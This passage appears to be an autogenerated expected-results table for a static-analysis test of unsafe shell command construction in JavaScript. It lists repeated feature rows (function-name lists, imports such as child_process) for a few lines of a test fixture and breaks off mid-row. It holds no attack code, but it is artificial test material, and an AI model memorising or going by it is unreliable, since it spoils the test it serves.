Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | {promis ... 'util') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | {promis ... 'util') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:7:473:35 | {promis ... 'util') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:8:473:16 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:27 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:27 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | exceptional return of require('util') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | exceptional return of require('util') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | exceptional return of require('util') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | require('util') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | require('util') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | require('util') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:29:473:34 | 'util' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:10 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:10 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:10 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:10 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec = ... ).exec) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec = ... ).exec) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:7:475:53 | exec = ... ).exec) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:22 | promisify | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:22 | promisify | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:22 | promisify | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | exceptional return of promisi ... ).exec) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | exceptional return of promisi ... ).exec) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | exceptional return of promisi ... ).exec) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | promisi ... ).exec) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | promisi ... ).exec) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | promisi ... ).exec) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:30 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:30 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:30 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | exceptional return of require ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | exceptional return of require ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | require ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 